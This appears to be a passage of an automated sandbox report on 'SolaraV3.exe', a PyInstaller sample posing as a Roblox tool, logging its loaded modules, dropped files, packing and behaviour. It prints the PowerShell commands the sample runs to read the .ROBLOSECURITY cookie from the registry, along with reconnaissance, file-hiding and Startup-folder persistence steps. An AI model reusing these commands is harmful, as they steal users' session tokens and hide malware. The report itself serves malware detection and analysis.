Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST

Source: C:\Users\user\Desktop\SolaraV3.exe

File opened: C:\Users\user\Desktop\pyvenv.cfg

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SolaraV3.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: SolaraV3.exe

Static file information: File size 6315120 > 1048576

Source: SolaraV3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SolaraV3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SolaraV3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SolaraV3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SolaraV3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SolaraV3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SolaraV3.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: SolaraV3.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: SolaraV3.exe, 00000002.00000002.2054170176.00007FFB1E4C1000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: SolaraV3.exe, 00000002.00000002.2046985205.00007FFB0B7FC000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SolaraV3.exe, 00000001.00000003.1559590237.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2053703446.00007FFB1C3C1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.1.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2051655996.00007FFB0C5F1000.00000040.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2051929047.00007FFB18B71000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SolaraV3.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: SolaraV3.exe, 00000002.00000002.2051343700.00007FFB0C5DB000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: SolaraV3.exe, 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python310.pdb source: SolaraV3.exe, 00000002.00000002.2049056875.00007FFB0BECF000.00000040.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2053917460.00007FFB1E471000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.pdb source: powershell.exe, 0000004A.00000002.1847941368.00000239E7D72000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.pdbhP@ source: powershell.exe, 0000004A.00000002.1847941368.00000239E7D72000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: SolaraV3.exe, 00000002.00000002.2051343700.00007FFB0C5DB000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2053371221.00007FFB1C251000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: SolaraV3.exe, 00000002.00000002.2052555001.00007FFB1AB01000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: SolaraV3.exe, 00000002.00000002.2052925726.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-1_1.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000006E.00000000.1923151482.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmp, rar.exe, 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmp, rar.exe.1.dr
Source:	Binary string: D:\a\1\b\libssl-1_1.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2050619713.00007FFB0C411000.00000040.00000001.01000000.0000000E.sdmp

Source: SolaraV3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SolaraV3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SolaraV3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SolaraV3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SolaraV3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 2_2_00007FFB0BB66EE0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_00007FFB0BB66EE0

Source: python310.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0x179482
Source: unicodedata.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x4d519
Source: libffi-7.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0x9bb1
Source: _ctypes.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x15162
Source: _bz2.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x190ae
Source: sqlite3.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0xa7f83
Source: libcrypto-1_1.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0x118790
Source: libssl-1_1.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0x3bfea
Source: SolaraV3.exe	Static PE information: real checksum: 0x60f6c0 should be: 0x6069ca
Source: _queue.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0xd20c
Source: _socket.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x16097
Source: _ssl.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x15afd
Source: _hashlib.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x14a50
Source: se3yji4z.dll.93.dr	Static PE information: real checksum: 0x0 should be: 0xce6c
Source: _decimal.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x241ea
Source: select.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x927e
Source: _lzma.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x2099b
Source: _sqlite3.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x1931c

Source: libffi-7.dll.1.dr	Static PE information: section name: UPX2
Source: VCRUNTIME140.dll.1.dr	Static PE information: section name: _RDATA

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 14_2_00007FFAA935D2A5 pushad ; iretd

14_2_00007FFAA935D2A6

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Found pyInstaller with non standard icon

Source: C:\Users\user\Desktop\SolaraV3.exe

Process created: "C:\Users\user\Desktop\SolaraV3.exe"

Uses attrib.exe to hide files

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe

Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_queue.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\libffi-7.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\python310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Jump to dropped file

Source: C:\Users\user\Desktop\SolaraV3.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr

Jump to behavior

Source: C:\Users\user\Desktop\SolaraV3.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 1_2_00007FF6DC7076C0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,

1_2_00007FF6DC7076C0

Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
